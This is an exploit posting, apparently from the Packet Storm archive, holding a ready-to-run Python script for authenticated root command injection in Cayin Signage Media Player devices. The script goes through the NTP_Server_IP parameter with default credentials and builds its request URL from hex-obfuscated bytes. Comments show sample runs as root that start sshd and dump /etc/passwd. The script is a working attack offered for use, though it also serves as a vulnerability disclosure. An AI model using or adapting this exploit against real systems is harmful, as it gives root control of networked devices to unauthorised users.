what you don't know can hurt you

Cayin Signage Media Player 3.0 Root Remote Command Injection

Cayin Signage Media Player 3.0 Root Remote Command Injection
Posted Jun 4, 2020
Authored by LiquidWorm | Site zeroscience.mk

CAYIN SMP-xxxx suffers from an authenticated OS command injection vulnerability using default credentials. This can be exploited to inject and execute arbitrary shell commands as the root user through the NTP_Server_IP HTTP GET parameter in system.cgi and wizard_system.cgi pages.

tags | exploit, web, arbitrary, shell, cgi, root
MD5 | 9a04cbad2c7bcc1e00789b91f73a0061

Cayin Signage Media Player 3.0 Root Remote Command Injection

Change Mirror Download
#!/usr/bin/env python3
#
#
# Cayin Signage Media Player 3.0 Root Remote Command Injection
#
#
# Vendor: CAYIN Technology Co., Ltd.
# Product web page: https://www.cayintech.com
# Affected version: SMP-8000QD v3.0
# SMP-8000 v3.0
# SMP-6000 v3.0 Build 19025
# SMP-6000 v1.0 Build 14246
# SMP-6000 v1.0 Build 14199
# SMP-6000 v1.0 Build 14167
# SMP-6000 v1.0 Build 14097
# SMP-6000 v1.0 Build 14090
# SMP-6000 v1.0 Build 14069
# SMP-6000 v1.0 Build 14062
# SMP-4000 v1.0 Build 14098
# SMP-4000 v1.0 Build 14092
# SMP-4000 v1.0 Build 14087
# SMP-2310 v3.0
# SMP-2300 v3.0 Build 19316
# SMP-2210 v3.0 Build 19025
# SMP-2200 v3.0 Build 19029
# SMP-2200 v3.0 Build 19025
# SMP-2100 v10.0 Build 16228
# SMP-2100 v3.0
# SMP-2000 v1.0 Build 14167
# SMP-2000 v1.0 Build 14087
# SMP-1000 v1.0 Build 14099
# SMP-PROPLUS v1.5 Build 10081
# SMP-WEBPLUS v6.5 Build 11126
# SMP-WEB4 v2.0 Build 13073
# SMP-WEB4 v2.0 Build 11175
# SMP-WEB4 v1.5 Build 11476
# SMP-WEB4 v1.5 Build 11126
# SMP-WEB4 v1.0 Build 10301
# SMP-300 v1.0 Build 14177
# SMP-200 v1.0 Build 13080
# SMP-200 v1.0 Build 12331
# SMP-PRO4 v1.0
# SMP-NEO2 v1.0
# SMP-NEO v1.0
#
# Summary: CAYIN Technology provides Digital Signage
# solutions, including media players, servers, and
# software designed for the DOOH (Digital Out-of-home)
# networks. We develop industrial-grade digital signage
# appliances and tailored services so you don't have
# to do the hard work.
#
# Desc: CAYIN SMP-xxxx suffers from an authenticated
# OS command injection vulnerability using default
# credentials. This can be exploited to inject and
# execute arbitrary shell commands as the root user
# through the 'NTP_Server_IP' HTTP GET parameter in
# system.cgi and wizard_system.cgi pages.
#
# -----------------------------------------------------
# $ ./cayin.py 192.168.1.2 id
# uid=0(root) gid=65534(guest)
# # start sshd
# $ ./cayin.py 192.168.1.2 /mnt/libs/sshd/sbin/sshd
# $
# $ ./cayin.py 192.168.1.2 "netstat -ant|grep ':22'"
# tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN
# tcp 0 0 :::22 :::* LISTEN
# $ ./cayin.py 192.168.1.2 "cat /etc/passwd"
# root:x:0:0:root:/root:/bin/bash
# vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
# smbuser:x:500:0:SMB adiministrator:/opt/media:/sbin/nologin
# sshd:x:1000:0::/dev/null:/sbin/nologin
# $
# -----------------------------------------------------
#
# Tested on: CAYIN Technology KT-Linux v0.99
# Apache/1.3.42 (Unix)
# Apache/1.3.41 (Unix)
# PHP/5.2.5
# Linux 2.6.37
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2020-5569
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5569.php
#
#
# 15.05.2020
#

import requests
import sys#____
import re#_____

if len(sys.argv) < 3:
print("Cayin SMP WebManager Post-Auth RCE")
print("Usage: ./cayin.py [ip] [cmd]")
sys.exit(17)
else:
ip____address = sys.argv[1]
ex____command = sys.argv[2]

ur____identif = b"\x68\x74\x74\x70\x3a\x2f\x2f"
ur____identif += (bytes(ip____address, "utf-8"))
ur____identif += b"\x2f\x63\x67\x69\x2d\x62\x69"
ur____identif += b"\x6e\x2f\x77\x69\x7a\x61\x72"
ur____identif += b"\x64\x5f\x73\x79\x73\x74\x65"
ur____identif += b"\x6d\x2e\x63\x67\x69\x3f\x54"
ur____identif += b"\x45\x53\x54\x5f\x4e\x54\x50"
ur____identif += b"\x3d\x31\x26\x4e\x54\x50\x5f"
ur____identif += b"\x53\x65\x72\x76\x65\x72\x5f"
ur____identif += b"\x49\x50\x3d\x70\x6f\x6f\x6c"
ur____identif += b"\x2e\x6e\x74\x70\x2e\x6f\x72"
ur____identif += b"\x67\x25\x32\x36" ##########"
ur____identif += (bytes(ex____command, "utf-8"))
ur____identif += b"\x25\x32\x36" ##############"

ht____request = requests.get(ur____identif, auth = ("webadmin", "admin"))
re____outputs = re.search("</html>\n(.*)", ht____request.text, flags = re.S).group().strip("</html>\n")
print(re____outputs)
Login or Register to add favorites

File Archive:

July 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    15 Files
  • 2
    Jul 2nd
    19 Files
  • 3
    Jul 3rd
    12 Files
  • 4
    Jul 4th
    1 Files
  • 5
    Jul 5th
    2 Files
  • 6
    Jul 6th
    25 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    0 Files
  • 9
    Jul 9th
    0 Files
  • 10
    Jul 10th
    0 Files
  • 11
    Jul 11th
    0 Files
  • 12
    Jul 12th
    0 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    0 Files
  • 16
    Jul 16th
    0 Files
  • 17
    Jul 17th
    0 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close